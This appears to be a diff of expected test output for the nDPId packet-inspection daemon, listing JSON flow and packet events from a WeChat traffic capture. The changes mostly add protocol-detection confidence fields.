-01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1486,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1434,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01428{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1436,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1478,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167866226,"flow_last_seen":1492167871050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1492167871050,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1484,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01429{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1486,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
 00578{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167788126,"flow_last_seen":1492167840351,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":400,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167878856,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167788128,"flow_last_seen":1492167840352,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":400,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167878856,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167765433,"flow_last_seen":1492167776953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9786,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765657,"flow_last_seen":1492167777220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167765433,"flow_last_seen":1492167776953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9786,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765657,"flow_last_seen":1492167777220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765657,"flow_last_seen":1492167777220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00659{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795095,"flow_last_seen":1492167795102,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00649{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795088,"flow_last_seen":1492167795100,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00649{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795087,"flow_last_seen":1492167795096,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00650{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492167795292,"flow_last_seen":1492167796728,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00659{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795092,"flow_last_seen":1492167795103,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00649{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795090,"flow_last_seen":1492167795099,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00659{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795091,"flow_last_seen":1492167795098,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795095,"flow_last_seen":1492167795102,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00675{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795088,"flow_last_seen":1492167795100,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00675{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795087,"flow_last_seen":1492167795096,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492167795292,"flow_last_seen":1492167796728,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795092,"flow_last_seen":1492167795103,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00675{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795090,"flow_last_seen":1492167795099,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795091,"flow_last_seen":1492167795098,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1492167891596,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167905310,"flow_last_seen":1492167905310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167905310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1492167905310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167905310,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8Y7pAAEAGtXnAqAFny82Tq+K6AbsLFrb3AAAAAKACchA4ZAAAAgQFtAQCCAoAMtVNAAAAAAEDAwc="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1514,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167905561,"flow_last_seen":1492167905561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167905561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1514,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1492167905561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167905561,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8gtZAAEAGll3AqAFny82Tq+K7AbsB+ldaAAAAAKACchCg3QAAAgQFtAQCCAoAMtWMAAAAAAEDAwc="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1492167905585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167905585,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rpcdpBKCxa2+KASN8jmJgAAAgQFoAQCCApFr1oYADLVTQEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1492167905585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167905585,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Y7tAAEAGtYDAqAFny82Tq+K6AbsLFrb4XHaQS4AQAOVLfQAAAQEICgAy1ZJFr1oY"}
-00811{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1517,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167905310,"flow_last_seen":1492167905586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167905586,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1517,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167905310,"flow_last_seen":1492167905586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167905586,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1518,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1492167905858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167905858,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rtG\/8zAAfpXW6ASN8gnXAAAAgQFoAQCCApFr1pdADLVjAEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1519,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1492167905858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167905858,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0gtdAAEAGlmTAqAFny82Tq+K7AbsB+ldbRv\/MwYAQAOWMrQAAAQEICgAy1dZFr1pd"}
